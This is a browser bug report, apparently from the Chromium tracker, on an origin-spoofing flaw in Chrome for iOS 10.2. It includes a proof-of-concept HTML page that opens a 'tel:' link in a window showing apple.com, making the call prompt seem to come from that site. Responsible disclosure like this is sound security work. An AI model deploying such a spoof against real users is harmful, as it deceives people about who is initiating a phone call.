Steps to reproduce the problem:
In the latest Chrome iOS browser, open the PoC.html, the source code is listed below:
<!DOCTYPE HTML>
<html>

<head>

<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />

</head>

<body>

<form action="https://www.apple.com" target="aa" method="get" onsubmit="setTimeout('p()',1200);">

<input type="submit">

</form>

<script>

function p() {

  var t = window.open('tel:10010','aa');

}

</script>

</body>

</html>

You will find, it seems like that the 'https://www.apple.com' is intended to call 10010

What is the expected behavior?
This problem could also be reproduced in Firefox iOS and Safari in iOS 10.2. So I also filed this issue to Mozilla. Firefox iOS developer thought it was a bug and filed it to Webkit project:
https://bugs.webkit.org/show_bug.cgi?id=165160

So I think that it is important to let you noticed.

What went wrong?
You could take a look at the PoC.png. You will find, it seems like that the 'https://www.apple.com' is intended to call 10010. This is another kind of spoof.

Did this work before? N/A 

Chrome version: 55.0.2883.79  Channel: stable
OS Version: 10.2
Flash Version: Shockwave Flash 21.9 r9
 

Deleted: PoC.PNG 157 KB

	PoC.PNG 157 KB View Download